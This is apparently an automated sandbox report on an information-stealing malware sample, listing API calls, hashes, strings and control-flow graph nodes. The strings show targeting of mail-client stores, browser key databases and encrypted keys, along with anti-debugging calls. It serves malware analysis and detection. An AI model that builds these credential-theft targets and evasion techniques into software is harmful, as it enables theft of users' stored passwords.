                                                            • Instruction ID: b761a9eed8f132f3d76dd51699d475c40aa8c4f3e32308c58242f5baaa05262b
                                                            • Opcode Fuzzy Hash: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
                                                            • Instruction Fuzzy Hash: EA513672D041059BEF208F588845ABFB6A4EB9D312F34B563E516EB350D278CF814B9B
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,?,?,?,?,?,?,?,E3E203CD), ref: 004020D7
                                                            • ExitProcess.KERNEL32 ref: 00402428
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcessSleep
                                                            • String ID: Ku^%$Ku^%
                                                            • API String ID: 911557368-1067927601
                                                            • Opcode ID: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                            • Instruction ID: 7c1692d81d369eac2294152011f0ccab71a19272a549e25e1d59810d67b13e6b
                                                            • Opcode Fuzzy Hash: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                            • Instruction Fuzzy Hash: 82A1E571500B058BD7348E29D68862B76E0AB41714B248D3FE55BFBBE0D6FCE8459B0B
                                                            APIs
                                                            • NtQueryInformationProcess.NTDLL(000000FF,0000001F,?,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004227D5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InformationProcessQuery
                                                            • String ID: 9a%^$M%$M%
                                                            • API String ID: 1778838933-3204844187
                                                            • Opcode ID: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                            • Instruction ID: a14d1243167b6357461e6519a130038910b412cbb64089044718b0755659bab4
                                                            • Opcode Fuzzy Hash: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                            • Instruction Fuzzy Hash: 5A819875F04229ABCF28DF58EAD06ADB7B0AB24300FE48557D451E7351D2BC8A81CB4A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %localappdata%\Mailbird\Store$*.db$Mail Clients\Mailbird$\MessageIndex$kernel32.dll
                                                            • API String ID: 0-4169501468
                                                            • Opcode ID: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                            • Instruction ID: 37c33aadf0b1a5fededcf733a2f710a0aa0d7e8b715308be68c7b56e9875aa70
                                                            • Opcode Fuzzy Hash: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                            • Instruction Fuzzy Hash: C21209B1F4022A8BDF149B98A8C25BF7661EF10314FA4452BE411FA391D72D8A41CBDF
                                                            APIs
                                                            • lstrcmpiW.KERNELBASE(?,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,-000017AA), ref: 0043B7A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcmpi
                                                            • String ID: VL6T$VL6T$kernel32.dll
                                                            • API String ID: 1586166983-858732239
                                                            • Opcode ID: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                            • Instruction ID: ac9e96eee08e7f4766fdf27955405b0e073298ede107f6bf942f2813ff7035d8
                                                            • Opcode Fuzzy Hash: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                            • Instruction Fuzzy Hash: F912BA71D045198BCF28CA5988967BEB6B0EB1D300F24651BDA06EB760D73CDD818BDB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: UL6T$VL6T$VL6T$kernel32.dll
                                                            • API String ID: 4038537762-2028718673
                                                            • Opcode ID: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                            • Instruction ID: c2102a5980ece967c5cd64c746778263c5b3406957fe7555e788f878a3f1dfdb
                                                            • Opcode Fuzzy Hash: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                            • Instruction Fuzzy Hash: 99420BB1D001199BDF288A98C8656BF76B0AB18310F241767E915FB3D0D37C8E95CB9B
                                                            APIs
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00405575
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CryptDataUnprotect
                                                            • String ID: crypt32.dll$os_c576xedrypt.encry576xedpted_key
                                                            • API String ID: 834300711-975908830
                                                            • Opcode ID: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
                                                            • Instruction ID: 8c3ac9f04a9491c7941596228a2b8d17953981cc6a452a8cfbc5ca82bdd136a5
                                                            • Opcode Fuzzy Hash: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
                                                            • Instruction Fuzzy Hash: 4402B4B1E00A098FDF249A98DC816BFBB74EB14314F24457BE915FA3E0D37989418F5A
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,0043047B), ref: 0042F315
                                                            • lstrcatW.KERNEL32(?,\key4.db), ref: 0042F31F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: \key4.db
                                                            • API String ID: 4038537762-2908133219
                                                            • Opcode ID: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                            • Instruction ID: 3d8cc84be03ebf0018643bd6ad0f3ea75a9045ade11442e12932e6ab408eecf0
                                                            • Opcode Fuzzy Hash: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                            • Instruction Fuzzy Hash: C37198A6F0012996DF249968BC4157F23B16B92710FF40977E005DB391E27ECD8987AF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Mail Clients\eM Client$]^4$^^4$^^4
                                                            • API String ID: 0-1928883120
                                                            • Opcode ID: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                            • Instruction ID: 9be5ae4bf1e72463837e643df42d36053b45937ac977a5871966d9d3f700dc7e
                                                            • Opcode Fuzzy Hash: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                            • Instruction Fuzzy Hash: 5CE14DB1F4012A8BDF189E54FD822BF7662AB14304FA4052BE015FA395E73DCA4187DB
                                                            APIs
                                                              • Part of subcall function 0044E224: RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                              • Part of subcall function 0044E224: GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                            • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorFreeHeapInformationLastTimeZone
                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                            • API String ID: 3335090040-239921721
                                                            • Opcode ID: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                            • Instruction ID: 7ab12ca904d85c611abf05cc92b1328e63041ffa610859c45aae75821d6d65e9
                                                            • Opcode Fuzzy Hash: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                            • Instruction Fuzzy Hash: DA3159B2D00115ABCB11AFA6DC4695ABB74EF05797F10406BF804A7162E7789F04CB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gU@
                                                            • API String ID: 0-63564854
                                                            • Opcode ID: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                            • Instruction ID: 9bb5ed087af5853c8395ebcf4a55f6806a95a7423fdc301e10d6eb9c751f7a08
                                                            • Opcode Fuzzy Hash: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                            • Instruction Fuzzy Hash: 4FE1D871D042198BDF249B6888826BEBA70BB1D310F24252FE559FB390D77CCD418B9B
                                                            APIs
                                                            • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: ntdll.dll
                                                            • API String ID: 3535843008-2227199552
                                                            • Opcode ID: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                            • Instruction ID: 07c00f1c427ac074378915b2824e934ab5066280a98a6b1b7d7a0ad64244f161
                                                            • Opcode Fuzzy Hash: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                            • Instruction Fuzzy Hash: 7DF0E992A0016279E6106A669C0197B768CDE86361F144533F815E73D1E33C8E0192FE
                                                            APIs
                                                            • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: ntdll.dll
                                                            • API String ID: 3535843008-2227199552
                                                            • Opcode ID: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                            • Instruction ID: f273f3d0fb77e3baaf18c0c5406a57793bb7cae49ecc4258f7fe46d16d2ae272
                                                            • Opcode Fuzzy Hash: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                            • Instruction Fuzzy Hash: 08C08063F8102166850175D47C035AD631CD9D8337F1C4437F91AF2301F525161D01FB
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A39746
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 00A39766
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3920154401.0000000000A38000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A38000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a38000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: 62b4692468fa1bb4e49bcb92ce8b04d38887d3130979545ada235a16c54a7cb6
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: 1EF09632110711BBE7203FF5A88DBAF76ECAF49725F100529F656914C0DBF0EC454A61
                                                            APIs
                                                            • NtQuerySystemInformation.NTDLL(00000023,?,00000002,00000000), ref: 00424811
                                                              • Part of subcall function 004262A1: LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InformationLibraryLoadQuerySystem
                                                            • String ID:
                                                            • API String ID: 1217483125-0
                                                            • Opcode ID: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                            • Instruction ID: a7ee391c1cc3a25a3919c4d00fef5949a9432234e98ec336f1522245060c6ad6
                                                            • Opcode Fuzzy Hash: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                            • Instruction Fuzzy Hash: 1471C5B1B08261CBCB24DF18A58112EB6E0FBC5314FA65D1FE496EB351D63CC8858B5B
                                                            APIs
                                                            • NtQueryInformationProcess.NTDLL(000000FF,00000007,FFFFFF06,00000004,00000000), ref: 00421F7A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InformationProcessQuery
                                                            • String ID:
                                                            • API String ID: 1778838933-0
                                                            • Opcode ID: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                            • Instruction ID: 4c19edd8aa9c17fc0a78f2ac854e6ceab7ff99fd175543fb6d48c07bc42e7691
                                                            • Opcode Fuzzy Hash: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                            • Instruction Fuzzy Hash: B151B730F081359BCF248B5CAA8076DBAA5AB24315FA14517EB25E73B4C379DD81874B
                                                            APIs
                                                            • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC64), ref: 004245E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InformationThread
                                                            • String ID:
                                                            • API String ID: 4046476035-0
                                                            • Opcode ID: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                            • Instruction ID: e4e78e09ab512bb18b464cd4d2f873358ef8636b72ff0900b4d62f7f8a955cf4
                                                            • Opcode Fuzzy Hash: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                            • Instruction Fuzzy Hash: 372132B57046216BC7249E1CA84253EA6D4EBD8314F55593BFACBEF750D238CC809B87
                                                            APIs
                                                            • NtClose.NTDLL(F2E4C6A8,00000000), ref: 0042F21D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                            • Instruction ID: a368c7a5dfb214292b8ef9e9d0bae651ecd455d0456980d3106c0b1a917b6dbd
                                                            • Opcode Fuzzy Hash: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                            • Instruction Fuzzy Hash: 9DF06DB1900644DFD710DF99E989B5AFBF8EB48724F10C16AE4289B751D33C5844CF68
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                            • Instruction ID: c1995cbfc35cf923d3c3ea23a15c0124f92d8ae5a77ba2b7d44262ced24471db
                                                            • Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                            • Instruction Fuzzy Hash: AFE08C72912278EBCB15DB89C945D8AF3FCEB49B14B2500ABB501D3200C674EE04CBD4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                            • Instruction ID: 17c6e2c9dd4ac5a7344e966d1587fdb4c68b9ede7c11da59021095b760417012
                                                            • Opcode Fuzzy Hash: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                            • Instruction Fuzzy Hash: 09C08C7410098046EF298D10C271BA63364FBA2BCBF8005CEC4420BB46C66EAD8AD654

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4991 42f625-42f644 4992 42f64a-42f652 4991->4992 4993 42f654-42f659 4992->4993 4994 42f69b-42f6a0 4992->4994 4995 42f713-42f718 4993->4995 4996 42f65f-42f664 4993->4996 4997 42f756-42f75b 4994->4997 4998 42f6a6-42f6ab 4994->4998 4999 42f850-42f855 4995->4999 5000 42f71e-42f723 4995->5000 5001 42f7ca-42f7cf 4996->5001 5002 42f66a-42f66f 4996->5002 5003 42f761-42f766 4997->5003 5004 42f8a4-42f8a9 4997->5004 5005 42f811-42f816 4998->5005 5006 42f6b1-42f6b6 4998->5006 5021 42f85b-42f860 4999->5021 5022 42fa0e-42fa13 4999->5022 5013 42f93b-42f940 5000->5013 5014 42f729-42f72e 5000->5014 5009 42f9b0-42f9b5 5001->5009 5010 42f7d5-42f7da 5001->5010 5015 42f675-42f67a 5002->5015 5016 42f8d8-42f8dd 5002->5016 5019 42f984-42f989 5003->5019 5020 42f76c-42f771 5003->5020 5011 42fa29-42fa2e 5004->5011 5012 42f8af-42f8b4 5004->5012 5017 42f81c-42f821 5005->5017 5018 42f9dd-42f9e2 5005->5018 5007 42f8fa-42f8ff 5006->5007 5008 42f6bc-42f6c1 5006->5008 5035 42fc57-42fc6c lstrcatW 5007->5035 5036 42f905-42f90a 5007->5036 5027 42faf7-42fb08 lstrcatW 5008->5027 5028 42f6c7-42f6cc 5008->5028 5045 42f9bb-42f9c0 5009->5045 5046 42fcd8-42fcdf 5009->5046 5041 42f7e0-42f7e5 5010->5041 5042 42fb7d-42fbad 5010->5042 5023 42fa34-42fa39 5011->5023 5024 42fab9-42fac6 5011->5024 5029 42f8ba-42f8bf 5012->5029 5030 42fa8b-42faa8 5012->5030 5039 42fc71-42fc96 5013->5039 5040 42f946-42f94b 5013->5040 5031 42f734-42f739 5014->5031 5032 42fb0d-42fb39 5014->5032 5047 42f680-42f685 5015->5047 5048 42facb-42fad9 5015->5048 5033 42f8e3-42f8e8 5016->5033 5034 42fc27-42fc4a 5016->5034 5049 42f827-42f82c 5017->5049 5050 42fbe9-42fc18 call 42f625 call 430228 5017->5050 5051 42fce4-42fcef 5018->5051 5052 42f9e8-42f9ed 5018->5052 5043 42fca5-42fcc9 5019->5043 5044 42f98f-42f994 5019->5044 5037 42fd10-42fd17 5020->5037 5038 42f777-42f77c 5020->5038 5025 42f866-42f86b 5021->5025 5026 42fa75-42fa86 lstrcatW 5021->5026 5053 42fa19-42fa1e 5022->5053 5054 42faad-42fab4 5022->5054 5023->4992 5073 42fa3f-42fa70 call 419e6b call 447a80 * 2 5023->5073 5024->4992 5025->4992 5055 42f871-42f894 5025->5055 5026->4992 5027->4992 5074 42f6d2-42f6d7 5028->5074 5075 42fc1b-42fc22 5028->5075 5029->4992 5060 42f8c5-42f8d3 5029->5060 5030->4992 5076 42fb49-42fb6c call 447047 lstrcatW 5031->5076 5077 42f73f-42f744 5031->5077 5056 42fcd0-42fcd3 5032->5056 5080 42fb3f-42fb44 5032->5080 5033->4992 5062 42f8ee-42f8f5 5033->5062 5034->5056 5057 42fc50-42fc55 5034->5057 5035->4992 5036->4992 5063 42f910-42f91b call 40b129 5036->5063 5037->4992 5078 42f782-42f787 5038->5078 5079 42fb71-42fb78 5038->5079 5058 42fc98 5039->5058 5059 42fc9d-42fca0 5039->5059 5040->4992 5066 42f951-42f974 5040->5066 5081 42f7eb-42f7f0 5041->5081 5082 42fbbd-42fbd2 lstrcatW * 2 call 40b7bb 5041->5082 5042->5059 5083 42fbb3-42fbb8 5042->5083 5043->5056 5061 42fccb 5043->5061 5044->4992 5067 42f99a-42f9ab lstrcatW 5044->5067 5045->4992 5068 42f9c6-42f9d8 lstrcatW 5045->5068 5046->4992 5069 42f68b-42f690 5047->5069 5070 42fade-42fae7 5047->5070 5048->4992 5084 42f832-42f84b call 447047 5049->5084 5085 42fd1c-42fd21 5049->5085 5050->5075 5064 42fcf1-42fcf9 5051->5064 5065 42fcfb 5051->5065 5052->4992 5071 42f9f3-42fa09 5052->5071 5053->5065 5072 42fa24 5053->5072 5054->4992 5055->5056 5087 42f89a-42f89f 5055->5087 5056->4992 5057->5056 5058->5059 5059->4992 5060->4992 5061->5056 5062->4992 5103 42f920-42f936 5063->5103 5064->5037 5064->5065 5089 42fcfc 5065->5089 5066->5056 5091 42f97a-42f97f 5066->5091 5067->4992 5068->4992 5069->4992 5092 42f692-42f699 5069->5092 5070->5056 5096 42faed-42faf2 5070->5096 5071->4992 5072->4992 5073->4992 5074->4992 5094 42f6dd-42f703 5074->5094 5075->4992 5076->4992 5077->4992 5095 42f74a-42f751 5077->5095 5078->4992 5097 42f78d-42f7ba 5078->5097 5079->4992 5080->5056 5081->4992 5099 42f7f6-42f801 5081->5099 5109 42fbd7-42fbe4 5082->5109 5083->5059 5084->4992 5085->4992 5090 42fd27-42fd34 5085->5090 5087->5056 5089->5089 5091->5056 5092->4992 5094->5056 5105 42f709-42f70e 5094->5105 5095->4992 5096->5056 5097->5059 5106 42f7c0-42f7c5 5097->5106 5099->5056 5108 42f807-42f80c 5099->5108 5103->4992 5105->5056 5106->5059 5108->5056 5109->4992
                                                            APIs
                                                            • lstrcatW.KERNEL32(?,?), ref: 0042F9A2
                                                            • lstrcatW.KERNEL32(?,?), ref: 0042F9CF
                                                            • lstrcatW.KERNEL32(?,0045E102), ref: 0042FA7D
                                                            • lstrcatW.KERNEL32(?,0045E102), ref: 0042FAFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3919343999.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Vd3tOP5WSD.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat
                                                            • String ID: (lu$)lu$)lu$n_v$n_v$n_v
                                                            • API String ID: 4038537762-1534030094
                                                            • Opcode ID: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                            • Instruction ID: 4b57ba66ae2396d09571da8aec8c9542c80e7c55b9c92ca3ddc1ba6dd1b7a9a6
                                                            • Opcode Fuzzy Hash: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                            • Instruction Fuzzy Hash: 7AF11D71B0012E9BCF289F99E8515BEBAB4FB54310FE44537E401EA3B0D37989469B4B

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 5808 41a28f-41a2c9 call 447e24 call 44568a 5813 41a2cc-41a2d4 5808->5813 5814 41a341-41a346 5813->5814 5815 41a2d6-41a2db 5813->5815 5816 41a34c-41a351 5814->5816 5817 41a40e-41a413 5814->5817 5818 41a2e1-41a2e6 5815->5818 5819 41a3c5-41a3ca 5815->5819 5820 41a357-41a35c 5816->5820 5821 41a4b8-41a4bd 5816->5821 5822 41a419-41a41e 5817->5822 5823 41a53a-41a53f 5817->5823 5824 41a458-41a45d 5818->5824 5825 41a2ec-41a2f1 5818->5825 5826 41a3d0-41a3d5 5819->5826 5827 41a4f7-41a4fc 5819->5827 5830 41a362-41a367 5820->5830 5831 41a5a5-41a5aa 5820->5831 5828 41a6a1-41a6a6 5821->5828 5829 41a4c3-41a4c8 5821->5829 5832 41a424-41a429 5822->5832 5833 41a5ed-41a5f2 5822->5833 5840 41a705-41a70a 5823->5840 5841 41a545-41a54a 5823->5841 5836 41a463-41a468 5824->5836 5837 41a635-41a63a 5824->5837 5838 41a2f7-41a2fc 5825->5838 5839 41a578-41a57d 5825->5839 5842 41a5cb-41a5d0 5826->5842 5843 41a3db-41a3e0 5826->5843 5834 41a502-41a507 5827->5834 5835 41a6c9-41a6ce 5827->5835 5852 41a992-41a999 5828->5852 5853 41a6ac-41a6b1 5828->5853 5846 41a80e-41a828 call 41c270 call 41f9a4 5829->5846 5847 41a4ce-41a4d3 5829->5847 5848 41a758-41a771 5830->5848 5849 41a36d-41a372 5830->5849 5866 41a5b0-41a5b5 5831->5866 5867 41a902-41a909 5831->5867 5864 41a7db-41a7e2 5832->5864 5865 41a42f-41a434 5832->5865 5874 41a951-41a970 5833->5874 5875 41a5f8-41a5fd 5833->5875 5850 41a50d-41a512 5834->5850 5851 41a85f-41a866 5834->5851 5856 41a6d4-41a6d9 5835->5856 5857 41a99e-41a9a9 call 447e24 5835->5857 5868 41a7e7-41a7ee 5836->5868 5869 41a46e-41a473 5836->5869 5844 41a640-41a645 5837->5844 5845 41a97f-41a98d 5837->5845 5872 41a302-41a307 5838->5872 5873 41a727-41a735 5838->5873 5860 41a583-41a588 5839->5860 5861 41aa24-41aa2b 5839->5861 5862 41a9c0-41a9cb 5840->5862 5863 41a710-41a715 5840->5863 5854 41a550-41a555 5841->5854 5855 41a886-41a89c call 41941d call 419473 5841->5855 5870 41a936-41a94c 5842->5870 5871 41a5d6-41a5db 5842->5871 5858 41a797-41a7bf 5843->5858 5859 41a3e6-41a3eb 5843->5859 5844->5813 5878 41a64b call 41d057 5844->5878 5845->5813 5948 41a82d-41a834 5846->5948 5893 41a839-41a85a 5847->5893 5894 41a4d9-41a4de 5847->5894 5848->5813 5879 41a776-41a787 5849->5879 5880 41a378-41a37d 5849->5880 5895 41a518-41a51d 5850->5895 5896 41a86b-41a876 5850->5896 5851->5813 5852->5813 5853->5813 5881 41a6b7-41a6c4 5853->5881 5898 41a8b6-41a8e6 5854->5898 5899 41a55b-41a560 5854->5899 5950 41a8a1-41a8b1 5855->5950 5856->5813 5882 41a6df-41a700 call 41b251 5856->5882 5934 41a9ae-41a9bb 5857->5934 5890 41a7c5-41a7ca 5858->5890 5891 41a977-41a97a 5858->5891 5883 41a3f1-41a3f6 5859->5883 5884 41a7cf-41a7d6 5859->5884 5900 41a8f6-41a8fd 5860->5900 5901 